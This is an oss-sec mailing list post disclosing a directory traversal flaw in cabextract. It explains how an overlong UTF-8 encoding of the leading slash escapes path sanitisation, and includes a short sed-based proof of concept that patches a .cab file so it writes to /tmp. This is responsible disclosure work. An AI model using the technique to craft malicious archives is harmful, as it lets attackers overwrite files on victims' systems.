oss-sec mailing list archives
CVE Request: cabextract -- directory traversal
From: Alexander Cherepanov <ch3root () openwall com>
Date: Wed, 18 Feb 2015 13:11:55 +0300
Hi!cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory.
Illustration: $ touch xxxxxxxxxx $ lcab xxxxxxxxxx test.cab $ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab $ rm xxxxxxxxxx $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ ./cabextract test.cab Extracting cabinet: test.cab extracting /tmp/abs All done, no errors. $ ls /tmp/abs /tmp/absIn the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag.
The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary.
The issue was reported to Stuart Caie today and fixed in less than 4h: http://sourceforge.net/p/libmspack/code/217/ Another release of cabextract is expected in the next few days. Could CVE please be assigned? -- Alexander Cherepanov
Current thread:
- CVE Request: cabextract -- directory traversal Alexander Cherepanov (Feb 18)
- Re: CVE Request: cabextract -- directory traversal cve-assign (Feb 22)
- Re: Re: CVE Request: cabextract -- directory traversal Alexander Cherepanov (Feb 23)
- Re: CVE Request: cabextract -- directory traversal cve-assign (Feb 23)
- Re: Re: CVE Request: cabextract -- directory traversal Alexander Cherepanov (Feb 23)
- Re: CVE Request: cabextract -- directory traversal cve-assign (Feb 22)